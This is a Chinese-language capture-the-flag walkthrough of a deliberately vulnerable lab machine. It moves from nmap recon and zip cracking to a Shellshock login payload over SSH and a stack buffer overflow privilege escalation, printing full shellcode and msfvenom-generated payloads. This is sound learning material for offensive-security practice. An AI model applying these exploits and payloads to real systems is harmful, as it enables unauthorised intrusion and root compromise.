一、主机发现
arp-scan -l
靶机ip:192.168.55.164
二、端口扫描、漏洞扫描、目录枚举、指纹识别
2.1端口扫描
nmap --min-rate 10000 -p- 192.168.55.164
发现21端口的ftp服务开启
以UDP协议进行扫描
使用参数-sU进行UDP扫描
nmap -sU --min-rate 10000 -p- 192.168.55.164
说明没有UDP端口开放
2.2漏洞扫描
nmap --script=vuln -p21,22,80 192.168.55.164
说明此靶机没有明显漏洞
2.3目录枚举
dirb http://192.168.55.164
2.4指纹识别
nmap 192.168.55.164 -sV -sC -O --version-all
指纹识别时看到21端口的ftp服务不能进行匿名登陆
三、进入靶机网页进行信息收集,拿到低权限shell
访问靶机网页,发现只有一张图片
3.1拿到密码文件
刚刚目录枚举出了一些信息
尝试在网页中打开
进去之后发现还是图片,这里感觉网站已经没有信息了,之后试了试中间件的漏洞,也没有合适的
随后将看到的图片都下载下来了,然后发现/noob这个目录下的图片名称有提示,让用cat查看该图片
去该目录下寻找答案
发现该文件是base64加密过的,尝试进行解密
base64 -d answer.txt > 1.txt
3.2拿到账号
这里只有密码,尝试去ftp服务找其它信息
根据提示,感觉用户名就是Tr0ll,密码也尝试一下Tr0ll
成功进入ftp服务,将其中的文件下载下来
下载后需要解压,发现解压需要密码
密码尝试使用刚刚解码后的文件,这里使用Fcrackzip工具
fcrackzip -u -D -p 1.txt lmao.zip
-u 用zip去尝试
-D 使用字典
-p 使用字符串作为初始密码/文件
fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统。
解压后是一个私钥
3.3拿到低权限shell
使用noob用户进行ssh登录
ssh -i noob noob@192.168.55.164
提示了sign_and_send_pubkey: no mutual signature supported,表示SSH连接时,客户端和服务器之间无法就公钥认证使用的签名算法达成一致。此时我们要加上一个 -o 参数
ssh -i noob noob@192.168.55.164 -o PubkeyAcceptedKeyTypes=+ssh-rsa
发现还是不行,不知道怎么办了,查资料发现是还有一个漏洞可以利用
发现shellshock攻击
ssh -i noob noob@192.168.55.164 -o PubkeyAcceptedKeyTypes=+ssh-rsa '() { :;}; /bin/bash'
成功拿下低权限shell
四、缓冲区溢出提权
升级shell
python -c 'import pty; pty.spawn("/bin/bash")'
4.1靶机信息收集
uname -a
lsb_release -a
尝试sudo提权,发现需要用户的密码
寻找SUID的命令
find / -perm -4000 -print 2>/dev/null
查找定时任务
crontab -l
没发现有用的信息
只能在目录中寻找其它信息
在根目录下找到这个文件,有点“此地无银三百两”的意思
进入之后找到了三个门
door1下的r00t会在执行后短时间内不可以执行命令
door2 下的r00t会退出ssh
查看这三个门下的文件大小
ls -lahR
发现只有7.2k和8.3k两种
其中8.3k的r00t文件提示需要提供参数
4.2缓冲区溢出漏洞(第一种方法)
4.2.1缓冲区溢出准备工作
首先要做的就是要把该程序拿到kali本机中
将8.3k的文件先进行base64编码
base64 r00t
然后将编码后的内容复制到kali中
然后在kali中将编码后的内容进行解码
cat 2 | base64 -d >r00t
使用gdb进行调试
disas main
发现存在缓冲区溢出函数
随后进行缓冲区溢出的调试
4.2.2判断溢出位置
使用msf的一个脚本
cd /usr/share/metasploit-framework/tools/exploit
./pattern_create.rb -l 1000
注:
此处的1000为一个较大的值,可以为500,600等任意一个较大的值
然后在gbd调试时将刚刚生成的值run即可
找到了溢出位置:0x6a413969
4.2.3寻找偏移量
还是在/usr/share/metasploit-framework/tools/exploit这个目录下使用msf的脚本
./pattern_offset.rb -q 6a413969 -l 1000
得知偏移量是268
4.2.4寻找ESP栈溢出地址
r $(python -c 'print ("A"*268 + "B"*4)') # 在GDB调试工具中 r表示启动调试当前程序
info r # 分析程序调试过程中的状态,在检查程序崩溃、调试函数调用及访问变量时,经常使用,前面已经有一个错误Program received signal SIGSEGV, Segmentation fault.,所以可以直接使用info r查看寄存器状态
eip也被覆盖
现在要找esp的位置
r $(python -c 'print ("A"*268 + "B"*4+"C"*20)')
经尝试,C字符写入8-20的时候,esp地址均为0xbffffb80
写入24之后就改变了
获得esp地址:0xbffffb80
注:
控制EIP跳转至shellcode,需要将shellcode设置到ESP地址。但在此之前,我们需要找到一个可靠的 ESP 地址。需要注意的是,OS 加载器将环境变量放在变化的堆栈区域之前,因此它会直接影响 ESP 地址。此外,如何调用程序也很重要。
通过取消设置环境变量参数LINES 和 COLUMNS来取消环境变量的影响,获取真实的ESP地址。
env - gdb r00t
show env
unset env LINES
unset env COLUMNS
去Shellcodes database for study cases网站上寻找exp
成功找到
构造payload:
./r00t $(python -c 'print "A"* 268 + "\x80\xfb\xff\xbf" + "\x90" *20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
成功提权!
4.3缓冲区溢出(第二种方法)
4.3.1寻找坏字符
此方法跟方法一只是反弹shell的方式不同,反弹shell之前的内容均相同
确定ESP的地址之后寻找坏字符
r $(python -c 'print "A"*268 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ')
查找坏字符:
x/256x $esp
x/256b $esp
两条命令互相使用,检查坏字符
0x00是一个坏字符
可知0x09是一个坏字符
去掉后继续进行测试
r $(python -c 'print "A"*268 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ')
发现依然错误,将0x0a去掉继续尝试
r $(python -c 'print "A"*268 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ')
对照发现是0x20是坏字符,去掉继续尝试
r $(python -c 'print "A"*268 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ')
发现后续的均连续,说明坏字符为:\x00\x0a\x09\x20
4.3.2msf编写payload
msfvenom -a x86 -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x20' -e x86/shikata_ga_nai -fc
编写payload
./r00t $(python -c 'print ("A"*268 + "\x80\xfb\xff\xbf" + "\x90"*20 + "\xba\xa0\x03\xb5\x23\xda\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x0b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x55\x69\xbe\x7b\x0c\x3c\xa6\x13\x03\xa2\xaf\x03\x33\x0b\xc3\xa3\xc3\x3b\x0c\x56\xaa\xd5\xdb\x75\x7e\xc2\xd4\x79\x7e\x12\xca\x1b\x17\x7c\x3b\xaf\x8f\x80\x14\x1c\xc6\x60\x57\x22")')
成功提权!